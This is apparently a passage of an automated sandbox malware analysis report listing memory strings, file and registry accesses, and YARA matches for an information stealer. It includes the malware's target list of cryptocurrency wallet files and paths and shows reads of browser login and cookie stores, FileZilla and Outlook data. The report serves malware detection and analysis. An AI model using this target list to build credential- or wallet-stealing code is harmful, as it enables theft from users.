                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLR]q
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q%appdata%`,]qdC:\Users\user\AppData\Roaming`,]qdC:\Users\user\AppData\Roaming\Binance
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR]q
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q&%localappdata%\Coinomi\Coinomi\walletsLR]q
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: RegAsm.exe, 00000005.00000002.2098178516.0000000000479000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                                Source: Yara matchFile source: 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2811418680.00000000004A6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: VP2pdCInvS.exe PID: 4512, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7464, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: newstart.exe PID: 2672, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 18.2.hello.exe.6c3a3000.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.hello.exe.6c380000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.hello.exe.6c3a3000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2811418680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 5.2.RegAsm.exe.482040.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.482040.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Z73fDV6g4L.exe.aa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000002.2098178516.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.2094530359.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe, type: DROPPED
                                Source: Yara matchFile source: 42.2.svchost.exe.1b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: FRaqbC8wSA1XvpFVjCRGryWt.exe PID: 2020, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1772, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 5.2.RegAsm.exe.436040.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.0.VP2pdCInvS.exe.890000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.0.newstart.exe.ec0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.436040.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000B.00000000.2095785467.0000000000892000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000000.3774634677.0000000000EC2000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6768, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Z73fDV6g4L.exe PID: 6220, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: VP2pdCInvS.exe PID: 4512, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: newstart.exe PID: 2672, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: see.exe PID: 1868, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exe, type: DROPPED
                                Source: Yara matchFile source: 00000014.00000002.2813138912.00000000032D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7464, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 18.2.hello.exe.6c3a3000.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.hello.exe.6c380000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.hello.exe.6c3a3000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2811418680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7464, type: MEMORYSTR
                                Source: Yara matchFile source: 5.2.RegAsm.exe.482040.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Z73fDV6g4L.exe.aa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.482040.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
